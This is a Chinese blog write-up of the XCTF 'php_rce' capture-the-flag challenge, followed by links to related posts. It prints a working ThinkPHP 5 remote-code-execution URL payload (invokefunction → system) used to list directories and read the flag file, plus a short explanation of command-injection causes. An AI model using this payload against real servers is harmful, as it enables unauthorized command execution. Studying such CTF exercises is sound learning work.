攻防世界web区答题

最新推荐文章于 2022-06-21 21:56:02 发布
最新推荐文章于 2022-06-21 21:56:02 发布
阅读量2.9k 收藏
点赞数
分类专栏: 攻防世界答题 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47435455/article/details/121286673
版权

攻防世界web区答题(高手进阶区php_rce)

1.php V5漏洞

1

payload如下:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

2

2.找flag

没有发现flag,一般flag都是放在根目录下,可以看到这不是根目录,所以我们用…/返回上一级目录。
3
没有,继续返回上一级
4
继续,发现flag
5
用cat查看,拿到flag
payload如下:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20../../../flag

6

总结

1.远程代码执行和远程命令执行概念-RCE(remote command/code execute):
系统命令:windows或者Linux命令,攻击者直接向后台服务器远程注入操作系统命令或者代码,进而控制后台系统。应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_ exec、passthru、pcntl_exec、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

2.远程系统命令执行漏洞产生原因?
没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

两颗西柚pine
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界web新手题答案_攻防世界XCTF-WEB-新手练习(1-3)
weixin_39884100的博客
11-21 1320
第一题:view_source题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。通过描述提示发现鼠标右键不能能使用,大概是让我们不让我们查看网页源代码,可以按f12打开开发者工具进行查看,flag是:cyberpeace{ac9d97dc4b075ec9a16834300222ef10}第二题:robots题目描述:X老师上课讲了Robots协议,小宁同学却上课打...
攻防世界 web高手进阶 1分题(baby_web、Training-WWW-Robots)
闵行小鱼塘
06-13 641
继续ctf的旅程,攻防世界web高手进阶的1分题
攻防世界 Web新手练习题解
weixin_45208900的博客
06-07 835
本质为简化记录
HTTP 方法:GET与 POST
weixin_34273481的博客
01-13 111
什么是 HTTP? 超文本传输协议(HTTP)的设计目的是保证客户机与服务器之间的通信。 HTTP 的工作方式是客户机与服务器之间的请求-应答协议。 web 浏览器可能是客户端,而计算机上的网络应用程序也可能作为服务器端。 举例:客户端(浏览器)向服务器提交 HTTP 请求;服务器向客户端返回响应。响应包含关于请求的状态信息以及可能被请求的内容。 两种 HTTP 请求方法:GET 和...
小白攻防世界web新手练习
m0_52934811的博客
12-22 132
攻防世界-view_source一、使用步骤1.打开攻防世界题目2.进入题目场景3.得出结果总结 因老师要求第一次写博客求大佬别挑刺 提示:下面案例可供参考 一、使用步骤 1.打开攻防世界题目 查看题目要求: 2.进入题目场景 如下(示例): 因为不能点击鼠标右键进入下一步 3.得出结果 直接使用F12,可以看到题目所需答案cyberpeace{de0bccbcb5114c8a14ee9efb2e073510} 总结 cyberpeace{de0bccbcb5114c8a14ee9efb2e0
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
2021-11-15练习攻防世界WEB初级题
hnkdjsjYxl的博客
11-16 3326
CTF新手题练习 概要:从零开始做WEB。 题目来源:攻防世界WEB新手题 (1)view source 这个题根据它提供的网址进入,点不了右键查看网络源代码,那就点快捷键F12即可查看源代码,从中搜索flag即可。 flag为cyberpeace{7e81c94cf7aae6a1c5754807daf85041} (2)Robots 最开始也和第一题一样先看源代码,没有发现flag,然后根据题意了解什么是robots协议,得知是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游
ctfhub技能树RCE部分(待完善)
qq_39670065的博客
11-09 605
eval执行 eval执行就是远程代码执行 看看代码 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 连上蚁剑 连上会发现这是一个Linux系统,要使用简单的Linux命令 ls 列出目录中的文件 cd 选择要进入的目录 cd / 返回到根目录 cat 查看文件 更多命令见linux常用命令学习 再次温馨提示:学习.
攻防世界Web新手题解(超详细)
weixin_52385170的博客
06-21 6886
Web新手题解
攻防世界 WEB 新手练习 答题(1-12题解)
小哈里的博客
10-23 9122
序 传送门:https://adworld.xctf.org.cn/task/ 1、
攻防世界web新手题解题步骤
m0_52923241的博客
03-06 596
view_source FLAG is not here,所以Ctrl+U查看源代码 找到flag为cyberpeace{86dd1ffe3e265fc884d0b12e8a2cce46} ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210305161223150.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV
攻防世界WEB新手练习(更新至11)
热门推荐
HHH's Blogs
08-09 1万+
001 view_source
XCTF Web Roborts
weixin_43982276的博客
10-07 421
XCTF Web Roborts 参考大佬博客https://blog.csdn.net/weixin_43272781/article/details/94296329 题目点进去一头雾水,不知道roborts是什么,查阅资料才知道是一个协议https://baike.baidu.com/item/robots%E5%8D%8F%E8%AE%AE/2483797 如下: robots协议也叫ro...
攻防世界wenewer题目
小学生的博客
11-27 323
WEB攻防新手题(任务3)(本周) 题目:'攻防世界’新手 1.view_source 题目简介: 右键呼不出开发者模式,是JS禁用了鼠标右键,按F12快捷键调用即可。 相关代码段: document.oncontextmenu=new Function("return false ") document.onselectstart=new Function("return false ") flag: cyberpeace{f3e91a8ed66d353b8d7c6241cae2acc1} 2..
CTF攻防世界web新手答题
xxhjtc的博客
06-19 5380
1.view-source 查看源代码:ctrl+u 或者按f12键,即可从源代码中找到flag。 2.
攻防世界web fileclude
最新发布
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值